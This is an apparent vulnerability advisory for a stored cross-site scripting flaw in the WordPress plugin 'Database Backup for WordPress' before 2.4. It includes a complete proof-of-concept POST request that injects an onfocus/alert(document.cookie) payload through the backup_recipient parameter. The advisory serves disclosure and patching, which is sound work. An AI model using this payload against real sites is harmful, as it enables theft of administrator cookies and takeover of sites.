Database Backup for WordPress < 2.4 - Authenticated Persistent Cross-Site Scripting (XSS)
Description
The plugin did not escape the backup_recipient POST parameter in before output it back in the attribute of an HTML tag, leading to a Stored Cross-Site Scripting issue.
Proof of Concept
POST /wp-admin/tools.php?page=wp-db-backup HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 602 Cookie: [admin cookies] _wpnonce=88a432b100&core_tables%5B%5D=wp_commentmeta&core_tables%5B%5D=wp_comments&core_tables%5B%5D=wp_links&core_tables%5B%5D=wp_options&core_tables%5B%5D=wp_postmeta&core_tables%5B%5D=wp_posts&core_tables%5B%5D=wp_term_relationships&core_tables%5B%5D=wp_term_taxonomy&core_tables%5B%5D=wp_terms&core_tables%5B%5D=wp_usermeta&core_tables%5B%5D=wp_users&deliver=smtp&backup_recipient=m0ze%40example.com%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&do_backup=fragments&submit=Backup+now%21
Affects Plugins
Fixed in version 2.4✓
Classification
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-05-16 (about 2 months ago)
Added
2021-05-16 (about 2 months ago)
Last Updated
2021-05-17 (about 2 months ago)